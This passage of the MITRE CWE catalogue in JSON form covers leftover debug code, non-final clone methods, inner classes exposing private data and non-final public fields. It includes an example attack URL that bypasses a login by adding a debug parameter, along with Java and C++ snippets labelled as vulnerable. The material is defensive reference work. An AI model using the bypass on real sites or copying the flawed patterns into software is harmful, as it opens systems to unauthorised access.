Privileges or Assume Identity","Varies by Context"],"Note":"The severity of the exposed debug application will depend on the particular instance. At the least, it will give an attacker sensitive information about the settings and mechanics of web applications on the server. At worst, as is often the case, the debug application will allow an attacker complete control over the web application and server, as well as confidential information that either of these access."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Build and Compilation","Distribution"],"Description":"Remove debug code before deploying the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Debug code can be used to bypass authentication. For example, suppose an application has a login script that receives a username and a password. Assume also that a third, optional, parameter, called \\"debug\\", is interpreted by the script as requesting a switch to debug mode, and that when this parameter is given the username and password are not checked. In such a case, it is very simple to bypass the authentication process if the special behavior of the application regarding the debug parameter is known. In a case where the form is:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;FORM ACTION=\\"/authenticate_login.cgi\\"&gt;&lt;/FORM&gt;","xhtml:div":{"#text":"&lt;INPUT TYPE=TEXT name=username&gt;&lt;INPUT TYPE=PASSWORD name=password&gt;&lt;INPUT TYPE=SUBMIT&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"http://TARGET/authenticate_login.cgi?username=...&amp;password=..."},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://TARGET/authenticate_login.cgi?username=&amp;password=&amp;debug=1"}],"Body_Text":["Then a conforming link will look like:","An attacker can change this to:","Which will grant the attacker access to the site, bypassing the authentication process."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Leftover Debug Code"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"121"}},{"attr":{"@_CAPEC_ID":"661"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"In J2EE a main method may be a good indicator that debug code has been left in the application, although there may not be any direct security impact.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Alternate_Terms"}],"Previous_Entry_Name":{"#text":"Leftover Debug Code","attr":{"@_Date":"2020-02-24"}}}},"491":{"attr":{"@_ID":"491","@_Name":"Public cloneable() Method Without Final (\'Object Hijack\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Make the cloneable() method final."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, a public class \\"BankAccount\\" implements the cloneable() method which declares \\"Object clone(string accountnumber)\\":","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount implements Cloneable{}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone(String accountnumber) throwsCloneNotSupportedException{}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = new BankAccount(account number);...","xhtml:br":["",""]}}}}}}},{"Intro_Text":"In the example below, a clone() method is defined without being declared final.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected Object clone() throws CloneNotSupportedException {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Object Hijack"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ07-J","Entry_Name":"Sensitive classes must not let themselves be copied"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-453"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Mobile Code: Object Hijack","attr":{"@_Date":"2008-04-11"}},{"#text":"Public cloneable() Method Without Final (aka \'Object Hijack\')","attr":{"@_Date":"2009-05-27"}}]}},"492":{"attr":{"@_ID":"492","@_Name":"Use of Inner Class Containing Sensitive Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers.","Extended_Description":"Inner classes quietly introduce several security concerns because of the way they are translated into Java bytecode. In Java source code, it appears that an inner class can be declared to be accessible only by the enclosing class, but Java bytecode has no concept of an inner class, so the compiler must transform an inner class declaration into a peer class with package level access to the original outer class. More insidiously, since an inner class can access private fields in its enclosing class, once an inner class becomes a peer class in bytecode, the compiler converts private fields accessed by the inner class into protected fields.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"\\"Inner Classes\\" data confidentiality aspects can often be overcome."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Using sealed classes protects object-oriented encapsulation paradigms and therefore protects code from being extended in unforeseen ways."},{"Phase":"Implementation","Description":"Inner Classes do not provide security. Warning: Never reduce the security of the object from an outer class, going to an inner class. If an outer class is final or private, ensure that its inner class is private as well."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java Applet code mistakenly makes use of an inner class.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"private final class urlHelper {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}}},{"Intro_Text":"The following example shows a basic use of inner classes. The class OuterClass contains the private member inner class InnerClass. The private inner class InnerClass includes the method concat that accesses the private member variables of the class OuterClass to output the value of one of the private member variables of the class OuterClass and returns a string that is a concatenation of one of the private member variables of the class OuterClass, the separator input parameter of the method and the private member variable of the class InnerClass.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class OuterClass {}","xhtml:div":{"#text":"private String memberOne;private String memberTwo;public OuterClass(String varOne, String varTwo) {}private class InnerClass {}","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// private member variables of OuterClass","// constructor of OuterClass","// InnerClass is a member inner class of OuterClass"],"xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"this.memberOne = varOne;this.memberTwo = varTwo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"private String innerMemberOne;public InnerClass(String innerVarOne) {}public String concat(String separator) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.innerMemberOne = innerVarOne;","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(\\"Value of memberOne is: \\" + memberOne);return OuterClass.this.memberTwo + separator + this.innerMemberOne;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"// InnerClass has access to private member variables of OuterClass","xhtml:br":["",""]}]}]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class OuterClass {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String memberOne;private static String memberTwo;public OuterClass(String varOne, String varTwo) {}private static class InnerClass {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private member variables of OuterClass","// constructor of OuterClass","// InnerClass is a static inner class of OuterClass"],"xhtml:div":[{"#text":"this.memberOne = varOne;this.memberTwo = varTwo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String innerMemberOne;public InnerClass(String innerVarOne) {}public String concat(String separator) {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.innerMemberOne = innerVarOne;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return memberTwo + separator + this.innerMemberOne;","xhtml:br":["",""],"xhtml:i":"// InnerClass only has access to static member variables of OuterClass"}}]}}]}}}}],"Body_Text":["Although this is an acceptable use of inner classes it demonstrates one of the weaknesses of inner classes that inner classes have complete access to all member variables and methods of the enclosing class even those that are declared private and protected. When inner classes are compiled and translated into Java bytecode the JVM treats the inner class as a peer class with package level access to the enclosing class.","To avoid this weakness of inner classes, consider using either static inner classes, local inner classes, or anonymous inner classes.","The following Java example demonstrates the use of static inner classes using the previous example. The inner class InnerClass is declared using the static modifier that signifies that InnerClass is a static member of the enclosing class OuterClass. By declaring an inner class as a static member of the enclosing class, the inner class can only access other static members and methods of the enclosing class and prevents the inner class from accessing nonstatic member variables and methods of the enclosing class. In this case the inner class InnerClass can only access the static member variable memberTwo of the enclosing class OuterClass but cannot access the nonstatic member variable memberOne.","The only limitation with using a static inner class is that as a static member of the enclosing class the inner class does not have a reference to instances of the enclosing class. For many situations this may not be ideal. An alternative is to use a local inner class or an anonymous inner class as shown in the next examples."]},{"Intro_Text":"In the following example the BankAccount class contains the private member inner class InterestAdder that adds interest to the bank account balance. The start method of the BankAccount class creates an object of the inner class InterestAdder, the InterestAdder inner class implements the ActionListener interface with the method actionPerformed. A Timer object created within the start method of the BankAccount class invokes the actionPerformed method of the InterestAdder class every 30 days to add the interest to the bank account balance based on the interest rate passed to the start method as an input parameter. The inner class InterestAdder needs access to the private member variable balance of the BankAccount class in order to add the interest to the bank account balance.","Body_Text":["However as demonstrated in the previous example, because InterestAdder is a non-static member inner class of the BankAccount class, InterestAdder also has access to the private member variables of the BankAccount class - including the sensitive data contained in the private member variables for the bank account owner\'s name, Social Security number, and the bank account number.","In the following example the InterestAdder class from the above example is declared locally within the start method of the BankAccount class. As a local inner class InterestAdder has its scope restricted to the method (or enclosing block) where it is declared, in this case only the start method has access to the inner class InterestAdder, no other classes including the enclosing class has knowledge of the inner class outside of the start method. This allows the inner class to access private member variables of the enclosing class but only within the scope of the enclosing method or block.","A similar approach would be to use an anonymous inner class as demonstrated in the next example. An anonymous inner class is declared without a name and creates only a single instance of the inner class object. As in the previous example the anonymous inner class has its scope restricted to the start method of the BankAccount class."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(double rate){}private class InterestAdder implements ActionListener{}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object","// InterestAdder is an inner class of BankAccount class","// that implements the ActionListener interface"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"ActionListener adder = new InterestAdder(rate);Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private double rate;public InterestAdder(double aRate){}public void actionPerformed(ActionEvent event){}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"this.rate = aRate;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest;","xhtml:br":["","",""],"xhtml:i":"// update interest"}}]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(final double rate){}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"class InterestAdder implements ActionListener{}ActionListener adder = new InterestAdder();Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","xhtml:br":["","","","","","","",""],"xhtml:i":["// InterestAdder is a local inner class","// that implements the ActionListener interface"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent event){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest;","xhtml:br":["","",""],"xhtml:i":"// update interest"}}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(final double rate){}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ActionListener adder = new ActionListener(){};Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","xhtml:br":["","","","","",""],"xhtml:i":"// anonymous inner class that implements the ActionListener interface","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent event){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount.this.balance += interest;","xhtml:br":["","","",""],"xhtml:i":["// update interest","double interest = BankAccount.this.balance * rate / 100;"]}}}}}}]}}}}]},{"Intro_Text":"In the following Java example a simple applet provides the capability for a user to input a URL into a text field and have the URL opened in a new browser window. The applet contains an inner class that is an action listener for the submit button, when the user clicks the submit button the inner class action listener\'s actionPerformed method will open the URL entered into the text field in a new browser window. As with the previous examples using inner classes in this manner creates a security risk by exposing private variables and methods. Inner classes create an additional security risk with applets as applets are executed on a remote machine through a web browser within the same JVM and therefore may run side-by-side with other potentially malicious code.","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"public class UrlToolApplet extends Applet {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton;public void init() {}private class SubmitButtonListener implements ActionListener {}","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// private member variables for applet components","// init method that adds components to applet","// and creates button listener object","// button listener inner class for UrlToolApplet class"],"xhtml:div":[{"#text":"setLayout(new FlowLayout());enterUrlLabel = new Label(\\"Enter URL: \\");enterUrlTextField = new TextField(\\"\\", 20);submitButton = new Button(\\"Submit\\");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);ActionListener submitButtonListener = new SubmitButtonListener();submitButton.addActionListener(submitButtonListener);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent evt) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (evt.getSource() == submitButton) {}","xhtml:div":{"#text":"String urlString = enterUrlTextField.getText();URL url = null;try {} catch (MalformedURLException e) {}if (url != null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"url = new URL(urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"Malformed URL: \\" + urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"getAppletContext().showDocument(url);","attr":{"@_style":"margin-left:10px;"}}]}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class UrlToolApplet extends Applet implements ActionListener {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton;public void init() {}public void actionPerformed(ActionEvent evt) {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private member variables for applet components","// init method that adds components to applet","// implementation of actionPerformed method of ActionListener interface"],"xhtml:div":[{"#text":"setLayout(new FlowLayout());enterUrlLabel = new Label(\\"Enter URL: \\");enterUrlTextField = new TextField(\\"\\", 20);submitButton = new Button(\\"Submit\\");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);submitButton.addActionListener(this);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (evt.getSource() == submitButton) {}","xhtml:div":{"#text":"String urlString = enterUrlTextField.getText();URL url = null;try {} catch (MalformedURLException e) {}if (url != null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"url = new URL(urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"Malformed URL: \\" + urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"getAppletContext().showDocument(url);","attr":{"@_style":"margin-left:10px;"}}]}}}]}}}}],"Body_Text":"As with the previous examples a solution to this problem would be to use a static inner class, a local inner class or an anonymous inner class. An alternative solution would be to have the applet implement the action listener rather than using it as an inner class as shown in the following example."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Use of Inner Class"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Publicizing of private data when using inner classes"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ08-J","Entry_Name":"Do not expose private members of an outer class from within a nested class"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Use of Inner Class","attr":{"@_Date":"2008-04-11"}}}},"493":{"attr":{"@_ID":"493","@_Name":"Critical Public Variable Without Final Modifier","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.","Extended_Description":"If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":["Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running.","Final provides security by only allowing non-mutable objects to be changed after being set. However, only objects which are not extended can be made final."]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The object could potentially be tampered with."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The object could potentially allow the object to be read."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Declare all public fields as final when possible, especially if it is used to maintain internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing the field from your code."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class WidgetData extends Applet {}","xhtml:div":{"#text":"public float price;...public WidgetData(...) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"this.price = LookupPrice(\\"MyWidgetType\\");","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData."},{"Intro_Text":"Assume the following code is intended to provide the location of a configuration file that controls execution of the application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":"public string configPath = \\"/etc/application/config.dat\\";"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"public String configPath = new String(\\"/etc/application/config.dat\\");"}],"Body_Text":"While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Non-Final Public Field"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to provide confidentiality for stored 